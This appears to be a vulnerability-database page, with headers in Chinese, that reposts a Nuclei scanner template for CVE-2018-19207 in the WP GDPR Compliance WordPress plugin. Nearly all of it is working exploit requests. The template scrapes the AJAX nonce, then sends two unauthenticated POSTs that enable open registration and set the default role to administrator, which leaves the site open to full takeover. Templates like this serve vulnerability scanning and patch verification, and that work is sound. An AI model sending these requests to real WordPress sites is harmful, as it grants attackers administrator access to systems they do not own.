CVE-2018-19207: WP GDPR Compliance < 1.4.3 - Unauthenticated Call Any Action or Update Any Option

日期: 2025-08-01 | 影响软件: WP GDPR Compliance | POC: 已公开

漏洞描述

The WP GDPR Compliance plugin allows unauthenticated users to execute any action and update any database value. This vulnerability is due to the lack of proper validation in the Includes/Ajax.php file.

PoC代码[已公开]

id: CVE-2018-19207

info:
  name: WP GDPR Compliance < 1.4.3 - Unauthenticated Call Any Action or Update Any Option
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    The WP GDPR Compliance plugin allows unauthenticated users to execute any action and update any database value. This vulnerability is due to the lack of proper validation in the Includes/Ajax.php file.
  reference:
    - https://wpvulndb.com/vulnerabilities/9157
    - https://github.com/aeroot/WP-GDPR-Compliance-Plugin-Exploit
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-19207
    cwe-id: CWE-425
    epss-score: 0.87744
    epss-percentile: 0.99438
    cpe: cpe:2.3:a:van-ons:wp-gdpr-compliance:*:*:*:*:*:wordpress:*:*
  metadata:
    vendor: van-ons
    product: wp-gdpr-compliance
    framework: wordpress
    publicwww-query: "wp-content/plugins/wp-gdpr-compliance/"
    verified: true
  tags: cve,cve2018,wordpress,wp-plugin,wp-gdpr-compliance,rce

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    extractors:
      - type: regex
        name: nonce
        part: body
        regex:
          - 'var wpgdprcData.*"ajaxSecurity":"([a-z0-9]+)"'
        group: 1
        internal: true

  - raw:

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wpgdprc_process_action&security={{nonce}}&data={"type":"save_setting","append":false,"option":"users_can_register","value":"1"}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wpgdprc_process_action&security={{nonce}}&data={"type":"save_setting","append":false,"option":"default_role","value":"administrator"}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"message":""'
          - '"error":""'
        condition: and

      - type: word
        part: content_type_2
        words:
          - 'application/json'
# digest: 4a0a00473045022037fc6455666e240c909fbaf1437c1451e1d1701999ef30dc95896b8b2579ad58022100f89bf503236cc36789a2d6e263fe13a2266b684c3139e1f6ff0c8a5460b05bf0:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-19207.yaml